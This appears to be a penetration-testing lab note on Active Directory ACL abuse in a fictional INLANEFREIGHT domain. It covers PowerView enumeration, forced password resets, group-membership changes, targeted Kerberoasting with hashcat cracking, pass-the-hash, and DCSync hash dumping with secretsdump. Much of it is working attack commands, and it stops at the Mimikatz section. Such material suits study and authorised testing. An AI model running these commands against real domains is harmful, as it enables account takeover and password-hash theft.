During an assessment where the client has taken care of all of the "low hanging fruit" AD flaws/misconfigurations, ACL abuse can be a great way for us to move laterally/vertically and even achieve full domain compromise.
Some example Active Directory object security permissions are as follows.
ForceChangePassword abused with Set-DomainUserPassword
Add Members abused with Add-DomainGroupMember
GenericAll abused with Set-DomainUserPassword or Add-DomainGroupMember
GenericWrite abused with Set-DomainObject
WriteOwner abused with Set-DomainObjectOwner
WriteDACL abused with Add-DomainObjectACL
AllExtendedRights abused with Set-DomainUserPassword or Add-DomainGroupMember
# First import PowerView moduleImport-Module.\PowerView.ps1# Now enumerateFind-InterestingDomainAcl
Now, there is a way to use a tool such as PowerView more effectively -- by performing targeted enumeration starting with a user that we have control over.
# First import PowerView moduleImport-Module.\PowerView.ps1# Obtain the SID of the user you have control on, for instance wley, and set it to variable $sid$sid=Convert-NameToSidwley# Find all domain objects that our user has rights over Get-DomainObjectACL-ResolveGUIDs-Identity*|?{$_.SecurityIdentifier-eq$sid}# -ResolveGUIDs: PowerView flag that will return the ObjectAceType property in a readable way and not as a GUID value that is not human readable.# Lists of objects which you have Force-Change-Password right over. First, get your current user’s sid by executing `whoami /user`, import powerview, then execute the below command to get the list of objects on which you have _Force-Change-Password_.get-objectacl-resolveguids|?{($_.securityidentifier-eq"[your_current_user_sid]")-and($_.objectacetype-eq"User-Force-Change-Password")}# Examine the rights that a user has over a group$sid=Convert-NameToSid$userSamAccountNameGet-DomainObjectACL-Identity"$groupName"-ResolveGUIDs|?{$_.SecurityIdentifier-eq$sid}# Examine the rights that a user has over another user$sid=Convert-NameToSid$user1SamAccountNameGet-DomainObjectACL-Identity"$user2SamAccountName"-ResolveGUIDs|?{$_.SecurityIdentifier-eq$sid}
The ObjectAceType User-Force-Change-Password means that we have the right to modify Dana Amundsen's password.
Without the PowerView flag -ResolveGUIDs, we would get ObjectAceType : 00299570-246d-11d0-a768-00aa006e0529, the GUID. We can google and get to this microsoft page. We can also perform a Reverse Search & Map to a GUID Value:
# Create a List of Domain UsersGet-ADUser-Filter*|Select-Object-ExpandPropertySamAccountName>ad_users.txt# For each user, use the Get-Acl cmdlet to retrieve ACL information of every user with the Get-ADUser cmdletforeach($linein[System.IO.File]::ReadLines("C:\Users\htb-student\Desktop\ad_users.txt")){get-acl"AD:\$(Get-ADUser$line)"|Select-ObjectPath-ExpandPropertyAccess|Where-Object{$_.IdentityReference-match'INLANEFREIGHT\\wley'}}# Once we have this data, we could follow the same methods shown above to convert the GUID to a human-readable format to understand what rights we have over the target user.$guid="00299570-246d-11d0-a768-00aa006e0529"Get-ADObject-SearchBase"CN=Extended-Rights,$((Get-ADRootDSE).ConfigurationNamingContext)"-Filter{ObjectClass-like'ControlAccessRight'}-Properties*|Select Name,DisplayName,DistinguishedName,rightsGuid|?{$_.rightsGuid-eq$guid}|fl
Set a user as the starting node, select the Node Info tab and scroll down to Outbound Control Rights.
This option will show us objects we have control over directly, via group membership, and the number of objects that our user could lead to us controlling via ACL attack paths under Transitive Object Control.
By right-clicking on the line between two objects, a menu will pop up.
ForceChangePassword
This abuse can be carried out when controlling an object that has a GenericAll, AllExtendedRights or User-Force-Change-Password over the target user.
# Wley will change the password of damundsen. First, open Powershell as Wley# Creating a PSCredential Object$SecPassword=ConvertTo-SecureString'$wleyPassword'-AsPlainText-Force$Cred=New-ObjectSystem.Management.Automation.PSCredential('INLANEFREIGHT\wley',$SecPassword)# Creating a SecureString Object$damundsenPassword=ConvertTo-SecureString'Pwn3d_by_ACLs!'-AsPlainText-Force# Changing the User's Passwordcd C:\Tools\Import-Module.\PowerView.ps1Set-DomainUserPassword-Identitydamundsen-AccountPassword$damundsenPassword-Credential$Cred-Verbose
Note: The SecureString object ($SecPassword) is associated with the user wley because it is used to create a PSCredential object, which represents a specific user's credentials. These credentials are used afterwards with the Set-DomainUserPassword command, whereas the -Credential parameter ensures that all actions taken within that cmdlet use the privileges of the wley account.
AddMember
This abuse can be carried out when controlling an object that has a GenericAll, GenericWrite, Self, AllExtendedRights or Self-Membership, over the target group.
Let's imagine we have gained access to the user damundsen via the ForceChangePassword abuse. Now we can continue using PowerView to take this attack further:
Our user damundsen has GenericWrite privileges over the Help Desk Level 1 group. This means, among other things, that the attacker can add a user/group/computer to a group.
# With net and cleartext credentials (will be prompted) netrpcgroupaddmem"$TargetGroup""$TargetUser"-U"$DOMAIN"/"$USER"-S"$DC_HOST"# With net and cleartext credentials netrpcgroupaddmem"$TargetGroup""$TargetUser"-U"$DOMAIN"/"$USER"%"$PASSWORD"-S"$DC_HOST"# With Pass-the-Hash pth-netrpcgroupaddmem"$TargetGroup""$TargetUser"-U"$DOMAIN"/"$USER"%"ffffffffffffffffffffffffffffffff":"$NT_HASH"-S"$DC_HOST"
# Creating a SecureString Object using damundsen$SecPassword=ConvertTo-SecureString'Pwn3d_by_ACLs!'-AsPlainText-Force$Cred2=New-ObjectSystem.Management.Automation.PSCredential('INLANEFREIGHT\damundsen',$SecPassword)# Creating a Fake SPNSet-DomainObject-Credential$Cred2-Identityadunn-SET@{serviceprincipalname='notahacker/LEGIT'}-Verbose# Kerberoasting with Rubeus.\Rubeus.exekerberoast/user:adunn/nowrap# Crack ithashcat-m13100$filename/usr/share/wordlists/rockyou.txt
# 1. Removing the Fake SPN from adunn's AccountSet-DomainObject-Credential$Cred2-Identityadunn-Clearserviceprincipalname-Verbose# 2. Remove the damundsen user from the Help Desk Level 1 groupRemove-DomainGroupMember-Identity"Help Desk Level 1"-Members'damundsen'-Credential$Cred2-Verbose# Confirming damundsen was Removed from the GroupGet-DomainGroupMember-Identity"Help Desk Level 1"|Select MemberName|?{$_.MemberName-eq'damundsen'}-Verbose
DCSync
DCSync is a technique for stealing the Active Directory password database by using the built-in Directory Replication Service Remote Protocol, which is used by Domain Controllers to replicate domain data. This allows an attacker to mimic a Domain Controller to retrieve user NTLM password hashes.
The crux of the attack is requesting a Domain Controller to replicate passwords via the DS-Replication-Get-Changes-All extended right. This is an extended access control right within AD, which allows for the replication of secret data.
To perform this attack, you must have control over an account that has the rights to perform domain replication (a user with the Replicating Directory Changes and Replicating Directory Changes All permissions set). Domain/Enterprise Admins and default domain administrators have this right by default.
1. Use Get-DomainUser to View the users's Group Membership:
# we obtained the sid from previous command$sid="S-1-5-21-3842939050-3880317879-2865463114-1164"Get-ObjectAcl"DC=inlanefreight,DC=local"-ResolveGUIDs|?{($_.ObjectAceType-match'Replication-Get')}|?{$_.SecurityIdentifier-match$sid}|select AceQualifier,ObjectDN,ActiveDirectoryRights,SecurityIdentifier,ObjectAceType|fl
DCSync replication can be performed using tools such as Mimikatz, Invoke-DCSync, and Impacket’s secretsdump.py.
secretsdump.py-outputfile$filename-just-dc$domain/$userSamAccountName@$ipDomainController# As an example:# secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5 # -just-dc flag tells the tool to extract NTLM hashes and Kerberos keys from the NTDS file.# -just-dc flag tells the tool to extract NTLM hashes and Kerberos keys from the NTDS file.# just-dc-user <USERNAME> to only extract data for a specific user# -pwd-last-set to see when each account's password was last changed# -history if we want to dump password history# -user-status flag to check and see if a user is disabled. # This will generate 3 files with dumped secrets
Reversible Encryption Password Storage Set
When this option is set on a user account, the passwords are stored using RC4 encryption, the key needed to decrypt them is stored in the registry (the Syskey) and can be extracted by a Domain Admin or equivalent.
Enumerate accounts with reversible Encryption Password Storage Set with Active Directive cmdlet:
secretsdump.py-outputfile$filename-just-dc$domain/$userSamAccountName@$ipDomainController# As an example:# secretsdump.py -outputfile inlanefreight_hashes -just-dc INLANEFREIGHT/adunn@172.16.5.5
Mimikatz
Way #1
Mimikatz must be ran in the context of the user who has DCSync privileges. We can utilize runas.exe to accomplish this:
If we have access to the host with an user who has DCSync privileges (DS-Replication-Get-Changes and the DS-Replication-Get-Changes-All privilege) on the domain, we can run from powershell the attack in one line:
